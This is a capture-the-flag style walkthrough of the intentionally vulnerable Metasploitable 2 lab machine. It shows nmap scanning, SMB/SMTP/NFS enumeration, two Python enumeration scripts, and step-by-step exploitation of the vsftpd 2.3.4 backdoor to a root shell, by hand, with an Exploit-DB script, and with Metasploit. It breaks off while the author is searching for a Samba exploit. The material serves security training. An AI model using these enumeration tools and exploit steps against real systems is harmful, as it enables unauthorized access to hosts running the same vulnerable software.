Metasploitable 2

Metasploitable 2 is a purposely vulnerable virtual machine designed for security testing, training and educational purposes. Here is a complete walkthrough of the machine.

Scanning

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -O -p- 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00067s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.204.137
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2024-04-27T09:00:29+00:00; +7s from scanner time.
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      48158/udp   mountd
|   100005  1,2,3      53046/tcp   mountd
|   100021  1,3,4      39352/udp   nlockmgr
|   100021  1,3,4      52660/tcp   nlockmgr
|   100024  1          36532/tcp   status
|_  100024  1          37990/udp   status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 9
|   Capabilities flags: 43564
|   Some Capabilities: Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, Support41Auth, SupportsCompression
|   Status: Autocommit
|_  Salt: ddGt6L^rC8/!VoJfBTbp
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2024-04-27T09:00:29+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 2:37:34
|   source ident: nmap
|   source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_  error: Closing Link: pydyrtxam[192.168.204.137] (Quit: pydyrtxam)
6697/tcp  open  irc         UnrealIRCd (Admin email [email protected])
| irc-info: 
|   users: 2
|   servers: 1
|   lusers: 2
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 2:37:34
|   source ident: nmap
|   source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_  error: Closing Link: aglkdhksl[192.168.204.137] (Quit: aglkdhksl)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
36532/tcp open  status      1 (RPC #100024)
43137/tcp open  java-rmi    GNU Classpath grmiregistry
52660/tcp open  nlockmgr    1-4 (RPC #100021)
53046/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:71:62:0D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2024-04-27T05:00:17-04:00
|_clock-skew: mean: 1h00m07s, deviation: 2h00m00s, median: 7s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.23 seconds

Enumeration

Netbios Enumeration

nbtscan on Kali accepts an address range, so we can enumerate the complete subnet for NetBIOS names:

┌──(kali㉿kali)-[~]
└─$ nbtscan -r 192.168.204.135/24
Doing NBT name scan for addresses from 192.168.204.135/24

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.204.1    DESKTOP-GF76LUG  <server>  <unknown>        00:50:56:c0:00:08
192.168.204.135  <unknown>                  <unknown>        
192.168.204.136  METASPLOITABLE   <server>  METASPLOITABLE   00:00:00:00:00:00
192.168.204.255 Sendto failed: Permission denied

We can see the machine name. Similarly, we can run an nmap scan with the nbstat script, which also lists the registered names with their suffixes (<00> workstation, <03> messenger, <20> file server) and whether each is a unique or a group name:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.204.136 --script nbstat.nse
Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
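To see what nbtscan and nmap's nbstat script actually put on the wire, here is an added Python example (my own code, not part of the original walkthrough) that builds the NetBIOS Node Status query sent to UDP/137 and parses the reply into the same name table nmap printed above. The reply it parses offline is constructed to match that output (five names, zero MAC as nbtscan reported); the transaction ID and the 40-byte zero statistics block are my own choices.

```python
# Added example (not part of the original walkthrough): build the NetBIOS
# Node Status (NBSTAT) query that nbtscan and nmap's nbstat.nse send to
# UDP/137, and parse the reply into the name table nmap prints.
import socket
import struct

NBSTAT = 0x0021      # question/record type for a node status request
CLASS_IN = 0x0001
WILDCARD = "*"       # "*" asks the host for its whole name table


def encode_netbios_name(name, suffix, pad=b" "):
    """First-level encoding: 15-byte name + 1-byte suffix, each byte split into
    two nibbles and offset by 'A'. '*' padded with NULs becomes 'CKAAAA...'."""
    raw = name.upper().encode("ascii")[:15]
    raw = raw + pad * (15 - len(raw)) + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def build_nbstat_request(txid):
    """12-byte NBNS header, one question for '*'<00>, type NBSTAT, class IN (50 bytes)."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    qname = bytes([32]) + encode_netbios_name(WILDCARD, 0x00, pad=b"\x00") + b"\x00"
    return header + qname + struct.pack(">HH", NBSTAT, CLASS_IN)


def _skip_name(data, off):
    """Advance past a DNS-style name (label sequence or 0xC0 compression pointer)."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length


def parse_nbstat_response(data):
    """Return {'txid', 'names': [...], 'mac'} from an NBSTAT reply."""
    txid, flags, qd, an, ns, ar = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000:
        raise ValueError("not a response packet")
    if an == 0:
        raise ValueError("no answer record")
    off = 12
    for _ in range(qd):                       # questions are normally absent in replies
        off = _skip_name(data, off) + 4
    off = _skip_name(data, off)
    rtype, rclass, ttl, rdlen = struct.unpack_from(">HHIH", data, off)
    off += 10
    if rtype != NBSTAT:
        raise ValueError(f"unexpected record type {rtype:#06x}")
    num_names = data[off]
    off += 1
    names = []
    for _ in range(num_names):
        entry = data[off:off + 18]            # 15-byte name, suffix, 2 flag bytes
        off += 18
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append({
            "name": entry[:15].rstrip(b" \x00").decode("ascii", "replace"),
            "suffix": entry[15],
            "group": bool(nflags & 0x8000),   # G bit: group (WORKGROUP<00>) vs unique
            "active": bool(nflags & 0x0400),  # ACT bit
        })
    mac = data[off:off + 6]                   # statistics block starts with the unit ID
    return {"txid": txid, "names": names, "mac": ":".join(f"{b:02x}" for b in mac)}


def nbstat_query(host, timeout=2.0):
    """Send the request to UDP/137 on host and parse the reply (needs a live target)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_nbstat_request(0x1234), (host, 137))
        data, _ = sock.recvfrom(4096)
    finally:
        sock.close()
    return parse_nbstat_response(data)


def sample_response():
    """Constructed reply mirroring the name table nmap printed for METASPLOITABLE."""
    entries = [("METASPLOITABLE", 0x00, 0x0400), ("METASPLOITABLE", 0x03, 0x0400),
               ("METASPLOITABLE", 0x20, 0x0400), ("WORKGROUP", 0x00, 0x8400),
               ("WORKGROUP", 0x1E, 0x8400)]
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += name.encode().ljust(15) + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += bytes(6) + bytes(40)             # zero MAC (as nbtscan showed) + statistics
    header = struct.pack(">HHHHHH", 0x1234, 0x8400, 0, 1, 0, 0)
    rr_name = bytes([32]) + encode_netbios_name(WILDCARD, 0x00, pad=b"\x00") + b"\x00"
    return header + rr_name + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, len(rdata)) + rdata


if __name__ == "__main__":
    import sys
    info = nbstat_query(sys.argv[1]) if len(sys.argv) > 1 else parse_nbstat_response(sample_response())
    for n in info["names"]:
        kind = "group" if n["group"] else "unique"
        print(f"{n['name']:<15}<{n['suffix']:02x}>  {kind}{' active' if n['active'] else ''}")
    print("MAC:", info["mac"])
```

Run it with the target IP as the only argument to query a live host, or with no argument to parse the constructed sample. Because the query goes out as a single unauthenticated UDP datagram, this is also why nbtscan could sweep a whole /24 in a couple of seconds above.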

Windows also has built-in tools to enumerate NetBIOS: nbtstat -c shows the local NetBIOS name cache, and nbtstat -A <ip> queries a remote host's name table.

C:\Users\Hp>nbtstat -c

SMB Enumeration

Nmap provides a number of scripts for SMB enumeration.

For example, we can use the smb-os-discovery script to identify the operating system through SMB:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 139,445 --script smb-os-discovery 192.168.204.136

Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 09:58 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00031s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:71:62:0D (VMware)

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2024-03-21T09:58:59-04:00

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

Similarly, we can list shares with smbclient:

┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.204.136
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            METASPLOITABLE

Similarly, we can check if we have read/write access on shares with smbmap.

┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.204.136
[+] IP: 192.168.204.136:445     Name: 192.168.204.136                                   
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (metasploitable server (Samba 3.0.20-Debian)   

We can see that we have write access on the tmp share, which will be useful in the exploitation phase.

We can also run the automated script enum4linux, which wraps these checks and extracts usernames as well.

SMTP Enumeration

We can also gather information about a host from its mail server. The Simple Mail Transfer Protocol (SMTP) supports several interesting commands, such as VRFY and EXPN. A VRFY request asks the server to verify that an address exists, while EXPN asks the server to expand a mailing list into its members. Both can often be abused to enumerate valid users on the mail server, which is useful information during a penetration test.

We can use the VRFY command to check whether users exist on the SMTP server. Postfix here answers 252 for a known local user and 550 for an unknown one:

┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 25            
(UNKNOWN) [192.168.204.136] 25 (smtp) open
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
VRFY msfadmin
252 2.0.0 msfadmin

We can use the Metasploit auxiliary module auxiliary/scanner/smtp/smtp_enum to enumerate SMTP users with its default user list:

msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.204.136:25    - 192.168.204.136:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

[+] 192.168.204.136:25    - 192.168.204.136:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, mysql, news, nobody, postfix, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] 192.168.204.136:25    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can also use smtp-user-enum to check whether the users in a list of our own exist:

┌──(kali㉿kali)-[~]
└─$ smtp-user-enum -M VRFY -U ~/Downloads/msfusers -t 192.168.204.136 

Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /home/kali/Downloads/msfusers
Target count ............. 1
Username count ........... 15
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Thu Mar 21 10:29:02 2024 #########
192.168.204.136: root exists
192.168.204.136: games exists
192.168.204.136: bin exists
192.168.204.136: nobody exists
192.168.204.136: sshd exists
192.168.204.136: dhcp exists
192.168.204.136: daemon exists
192.168.204.136: gnats exists
192.168.204.136: msfadmin exists
192.168.204.136: tomcat55 exists
######## Scan completed at Thu Mar 21 10:29:04 2024 #########
10 results.
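The VRFY probing that smtp-user-enum and smtp_enum perform is only a few lines of protocol, so here it is written out as an added Python example (my own code, not part of the original walkthrough or of either tool). It assumes the Postfix behaviour shown in the nc session above, 252 for a local user and 550 for an unknown one; the HELO name enum.local and the verdict labels are my own choices.

```python
# Added example, not code from the original walkthrough: the VRFY probing that
# smtp-user-enum and Metasploit's smtp_enum perform, written out so the reply
# codes are visible. Assumes the Postfix behaviour shown above: 252 for a local
# user, 550 for an unknown one.
import io
import socket


def read_reply(fp):
    """Read one SMTP reply from a text file-like object, following '250-...'
    continuation lines until the final '250 ' line. Returns (code, lines)."""
    lines = []
    while True:
        line = fp.readline()
        if not line:
            raise ConnectionError("server closed the connection")
        line = line.rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return line[:3], lines


def reply_from_text(text):
    """Parse a captured reply held in a string (handy for checking offline)."""
    return read_reply(io.StringIO(text))


def classify_vrfy_reply(code):
    """Turn the reply code to a VRFY command into a verdict."""
    if code in ("250", "251"):
        return "exists"      # address verified (251: will be forwarded)
    if code == "252":
        # RFC meaning: "cannot VRFY user, but will accept message". Postfix
        # sends it only for local users and answers 550 for unknown ones, so on
        # this target 252 is a positive result; other MTAs may send 252 for
        # every name, in which case it proves nothing.
        return "exists"
    if code in ("550", "551", "553"):
        return "unknown"
    if code in ("500", "502"):
        return "disabled"    # VRFY not implemented or switched off
    return "other"


def vrfy_users(host, users, port=25, timeout=5.0, helo="enum.local"):
    """Connect, say HELO, send one VRFY per candidate and return {user: verdict}."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        fp = sock.makefile("rw", encoding="ascii", errors="replace", newline="")
        code, _ = read_reply(fp)                 # 220 metasploitable.localdomain ESMTP ...
        if code != "220":
            raise ConnectionError(f"unexpected banner code {code}")
        fp.write(f"HELO {helo}\r\n")
        fp.flush()
        read_reply(fp)
        for user in users:
            fp.write(f"VRFY {user}\r\n")
            fp.flush()
            code, _ = read_reply(fp)
            results[user] = classify_vrfy_reply(code)
            if results[user] == "disabled":
                break                            # every further VRFY would fail the same way
        fp.write("QUIT\r\n")
        fp.flush()
    return results


if __name__ == "__main__":
    import sys
    target = sys.argv[1]
    candidates = sys.argv[2:] or ["root", "admin", "msfadmin"]
    for user, verdict in vrfy_users(target, candidates).items():
        print(f"{user}: {verdict}")
```

Run it as `python3 vrfy.py 192.168.204.136 root admin msfadmin` (file name is my own). The early exit on 500/502 matters in practice: a hardened Postfix with disable_vrfy_command=yes answers 502 to every VRFY, and hammering it with a wordlist only fills the mail log.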

NFS Enumeration

We can try to list down shares available with showmount.

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.204.136        
Export list for 192.168.204.136:
/ *

The export list shows that the root filesystem (/) is exported to every host (*), so we can mount it from the attacking machine and read or write files on the target.

Port 21 FTP Exploitation Metasploitable2

Scanning

Port 21 is open on Metasploitable2 and is running vsftpd 2.3.4. The source archive of that release was trojaned with a backdoor (CVE-2011-2523), which nmap's vulners script flags below.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p 21 192.168.204.136 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 07:59 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| vulners: 
|   cpe:/a:vsftpd:vsftpd:2.3.4: 
|       PRION:CVE-2011-2523     10.0    https://vulners.com/prion/PRION:CVE-2011-2523
|       EDB-ID:49757    10.0    https://vulners.com/exploitdb/EDB-ID:49757      *EXPLOIT*
|_      1337DAY-ID-36095        10.0    https://vulners.com/zdt/1337DAY-ID-36095        *EXPLOIT*
MAC Address: 00:0C:29:71:62:0D (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.66 seconds

Manual Exploitation vsftpd 2.3.4

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.204.136
Connected to 192.168.204.136.
220 (vsFTPd 2.3.4)
Name (192.168.204.136:kali): a:)
331 Please specify the password.
Password: 
421 Service not available, remote server has closed connection.
ftp: Login failed
ftp> exit

The trigger is a username containing ":)" (above we used a:)). The FTP login itself fails and vsftpd drops the control connection; that is expected. In the meantime the backdoored daemon has started listening on TCP port 6200, where it hands a root shell, without any authentication, to whoever connects:

┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 6200
(UNKNOWN) [192.168.204.136] 6200 (?) open
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Manual Exploitation vsftpd 2.3.4 Method 2

We can also use public exploits from Exploit-DB. Search for one with searchsploit:

┌──(kali㉿kali)-[~]
└─$ searchsploit vsftpd 2.3.4                           

--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                          | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                             | unix/remote/17491.rb
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Now copy the exploit into the current directory:

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 49757    

  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
    Codes: CVE-2011-2523
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/49757.py

Now run it against the target; it triggers the backdoor and drops us into the shell:

┌──(kali㉿kali)-[~]
└─$ python2 49757.py 192.168.204.136 
Success, shell opened
Send `exit` to quit shell
ls
bin
boot
cdrom
dev

FTP exploitation - Metasploit

Search for vsftpd in Metasploit:

msf6 auxiliary(scanner/vnc/vnc_login) > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

Now select the module, set the target and run it. The module triggers the backdoor, connects to port 6200 and hands us a root shell:

msf6 auxiliary(scanner/vnc/vnc_login) > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                      ki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.204.136
RHOST => 192.168.204.136
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.204.136:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.204.136:21 - USER: 331 Please specify the password.
[+] 192.168.204.136:21 - Backdoor service has been spawned, handling...
[+] 192.168.204.136:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.204.135:43497 -> 192.168.204.136:6200) at 2024-03-18 10:27:28 -0400

id
uid=0(root) gid=0(root)

Port 445 SMB Exploitation Metasploitable2

Scan the SMB ports with the vulners and vuln scripts:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p 139,445 192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 08:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00044s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 139,445 192.168.204.136 
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 08:58 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:62:0D (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.50 seconds

These two scans report only Samba 3.X - 4.X, so we can use the Metasploit auxiliary module smb_version to pin down the exact version.

msf6 > search smb version

Matching Modules
================

   #   Name                                                      Disclosure Date  Rank       Check  Description
   -   ----                                                      ---------------  ----       -----  -----------
   0   exploit/multi/http/struts_code_exec_classloader           2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   1   exploit/linux/misc/cisco_rv340_sslvpn                     2022-02-02       good       Yes    Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
   2   exploit/windows/smb/ms08_067_netapi                       2008-10-28       great      Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
   3   exploit/windows/browser/ms10_022_ie_vbscript_winhlp32     2010-02-26       great      No     MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
   4   exploit/windows/fileformat/ms14_060_sandworm              2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   5   auxiliary/dos/windows/smb/rras_vls_null_deref             2006-06-14       normal     No     Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
   6   auxiliary/dos/windows/smb/ms11_019_electbowser                             normal     No     Microsoft Windows Browser Pool DoS
   7   exploit/windows/smb/smb_rras_erraticgopher                2017-06-13       average    Yes    Microsoft Windows RRAS Service MIBEntryGet Overflow
   8   auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow                   normal     No     Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
   9   auxiliary/scanner/smb/smb_version                                          normal     No     SMB Version Detection

The SMB version scanner is at index 9:

msf6 > use 9
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/met
                                       asploit-framework/wiki/Using-Metasploit
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.204.136:445   - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.204.136:445   -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.204.136:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Running it, we get the exact Samba version (Samba 3.0.20-Debian).

Now let us see what searchsploit has for that version.

┌──(kali㉿kali)-[~]
└─$ searchsploit Samba 3.0.20
------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                 |  Path
------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                         | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploi | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                          | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                  | linux_x86/dos/36741.py
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

So we have a Metasploit module for the "username map script" command execution bug (CVE-2007-2447), which affects Samba 3.0.20 through 3.0.25rc3.

Samba exploitation Metasploitable 2 with Metasploit

msf6 auxiliary(scanner/smb/smb_version) > search samba user map

